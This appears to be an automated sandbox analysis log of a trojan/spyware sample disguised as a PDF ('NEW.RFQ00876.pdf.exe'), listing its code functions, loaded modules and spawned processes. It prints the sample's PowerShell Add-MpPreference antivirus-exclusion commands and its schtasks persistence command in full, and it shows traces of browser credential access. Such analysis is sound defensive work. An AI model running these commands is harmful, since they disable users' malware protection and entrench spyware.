                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104077023_2_01040770
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103C7C023_2_0103C7C0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105C6E023_2_0105C6E0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105696223_2_01056962
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010429A023_2_010429A0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104A84023_2_0104A840
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104284023_2_01042840
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0107889023_2_01078890
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010268B823_2_010268B8
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0106E8F023_2_0106E8F0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103EA8023_2_0103EA80
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104AD0023_2_0104AD00
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104ED7A23_2_0104ED7A
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01058DBF23_2_01058DBF
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01048DC023_2_01048DC0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103ADE023_2_0103ADE0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01040C0023_2_01040C00
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01030CF223_2_01030CF2
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01082F2823_2_01082F28
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01060F3023_2_01060F30
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010B4F4023_2_010B4F40
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010BEFA023_2_010BEFA0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01032FC823_2_01032FC8
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01040E5923_2_01040E59
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01052E9023_2_01052E90
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0107516C23_2_0107516C
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0102F17223_2_0102F172
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104B1B023_2_0104B1B0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0102D34C23_2_0102D34C
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010433F323_2_010433F3
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010452A023_2_010452A0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105B2C023_2_0105B2C0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105D2F023_2_0105D2F0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103146023_2_01031460
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104349723_2_01043497
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010874E023_2_010874E0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104B73023_2_0104B730
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104995023_2_01049950
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105B95023_2_0105B950
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104599023_2_01045990
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010AD80023_2_010AD800
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010438E023_2_010438E0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105FB8023_2_0105FB80
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010B5BF023_2_010B5BF0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0107DBF923_2_0107DBF9
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010B3A6C23_2_010B3A6C
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01043D4023_2_01043D40
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105FDC023_2_0105FDC0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01059C2023_2_01059C20
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010B9C3223_2_010B9C32
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01041F9223_2_01041F92
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01049EB023_2_01049EB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 018A7E54 appears 100 times
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 018DF290 appears 105 times
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 01895130 appears 57 times
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 018CEA12 appears 86 times
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 0184B970 appears 272 times
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: String function: 01087E54 appears 97 times
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: String function: 010AEA12 appears 37 times
                Source: NEW.RFQ00876.pdf.exeStatic PE information: invalid certificate
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1306087920.0000000004359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1306087920.0000000004359000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000000.1246174933.0000000000F82000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameaRrJg.exe. vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1335729190.0000000005D40000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1340769027.0000000007560000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemscorlib.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameaRrJg.exe. vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Core.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.000000000194D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe | Binary or memory string: OriginalFilenameaRrJg.exe. vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: NEW.RFQ00876.pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RAangyFeHdZLco.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, H87Xg77JWFJPkXQfOh.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, H87Xg77JWFJPkXQfOh.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/16@18/13
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | File created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | File created: C:\Users\user\AppData\Local\Temp\tmpEC94.tmp
                Source: NEW.RFQ00876.pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: NEW.RFQ00876.pdf.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1658127262.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3718631099.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1657993301.0000000002EDD000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3718631099.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NEW.RFQ00876.pdf.exe | ReversingLabs: Detection: 50%
                Source: NEW.RFQ00876.pdf.exe | Virustotal: Detection: 49%
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | File read: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                Source: unknown | Process created: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Process created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe | Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                Source: C:\Windows\SysWOW64\msinfo32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process created: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp"
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Process created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe | Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                Source: C:\Windows\SysWOW64\msinfo32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: textinputframework.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: coreuicomponents.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
